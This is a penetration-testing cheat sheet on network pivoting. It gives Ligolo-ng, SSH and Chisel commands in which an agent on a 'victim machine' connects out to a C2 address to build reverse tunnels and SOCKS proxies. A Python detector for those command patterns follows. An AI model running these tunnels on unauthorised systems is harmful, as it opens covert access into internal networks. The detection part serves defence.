Tunneling
#tunneling
#lateral-movement
#red
Ligolo-ng
1. Download
- Proxy: use the build for the attacker machine's architecture.
- Agent: use the build for the victim machine's architecture.
2. Run proxy
sudo ./proxy -selfcert
3. Run agent
./agent -connect <C2_IP>:11601 -ignore-cert
4. Configure tunnel
ligolo-ng » session (select session)
ligolo-ng » autoroute
5. Local Port Forwarding
- After the agent has connected to the proxy (Ligolo-ng redirects traffic for 240.0.0.1 to the agent's own 127.0.0.1):
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 240.0.0.1/32 dev ligolo
SSH Port Forwarding
1. Local Port Forwarding
Port 80, visible from the victim machine, is tunneled to port 8080 on the attacker machine.
ssh -L <IP>:8080:<IP>:80 <USER>@<IP>
In the browser, open http://localhost:8080
Chisel
1. Download
- Client and server must be the same version.
2. Reverse - SOCKS
Attacker machine:
./chisel server -p 8080 --reverse
Victim machine:
./chisel client <C2_IP>:8080 R:socks
3. SOCKS
Victim machine:
./chisel server -v -p 8080 --socks5
Attacker machine:
./chisel client -v 10.10.10.10:8080 socks
4. Port forwarding
Attacker machine:
./chisel server -p 12312 --reverse
Victim machine:
./chisel client <C2_IP>:12312 R:4505:127.0.0.1:4505
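Detection
The defender's view of the commands above, as an added example that is not part of the original notes or of any of these tools: a Python heuristic that flags the argument shapes used on this page when they appear in process-creation command lines. The sample lines, the indicator names and the classify/scan helpers are constructed for illustration.

```python
import re
import shlex

HOSTPORT = re.compile(r"^[^\s:]+:\d{1,5}$")
REMOTE = re.compile(r"^R:(socks|(\S+:)?\d+:\S+:\d+)$")  # chisel reverse remote

SAMPLE = [  # constructed process-creation command lines, not real telemetry
    "./agent -connect 203.0.113.7:11601 -ignore-cert",
    "/tmp/update client 203.0.113.7:8080 R:socks",  # renamed binary
    "ssh -L 127.0.0.1:8080:10.0.0.5:80 user@192.0.2.10",
    "sudo ip tuntap add user alice mode tun ligolo",
    "ssh user@192.0.2.10",
    "curl -s https://example.com/health",
]

def classify(cmdline):
    """Return the sorted tunnel indicators found in one command line."""
    argv = shlex.split(cmdline)
    if argv[:1] == ["sudo"]:
        argv = argv[1:]
    if not argv:
        return []
    name, args, hits = argv[0].rsplit("/", 1)[-1], argv[1:], set()
    # Match on argument shape: binary names are trivially changed.
    if "-connect" in args[:-1] and HOSTPORT.match(args[args.index("-connect") + 1]):
        hits.add("ligolo-agent-connect")
        if "-ignore-cert" in args:
            hits.add("tls-verification-disabled")
    if "-selfcert" in args:
        hits.add("ligolo-proxy-selfcert")
    if args[:1] == ["client"]:
        if any(REMOTE.match(a) for a in args):
            hits.add("chisel-reverse-remote")
        if "socks" in args:
            hits.add("chisel-socks-remote")
    if args[:1] == ["server"] and {"--reverse", "--socks5"} & set(args):
        hits.add("chisel-server-tunnel")
    # ssh and ip are system binaries, so the name is a usable anchor here.
    if name == "ssh" and "-L" in args[:-1]:
        if args[args.index("-L") + 1].count(":") in (2, 3):
            hits.add("ssh-local-forward")
    if name == "ip" and args[:2] == ["tuntap", "add"] and "tun" in args:
        hits.add("tun-interface-created")
    return sorted(hits)

def scan(lines):
    """Map each flagged command line to its indicators."""
    return {line: hits for line in lines if (hits := classify(line))}
```

A hit on ssh-local-forward or tun-interface-created alone is common in normal administration, so these indicators are best correlated with the network side (a long-lived outbound connection to the same host and port).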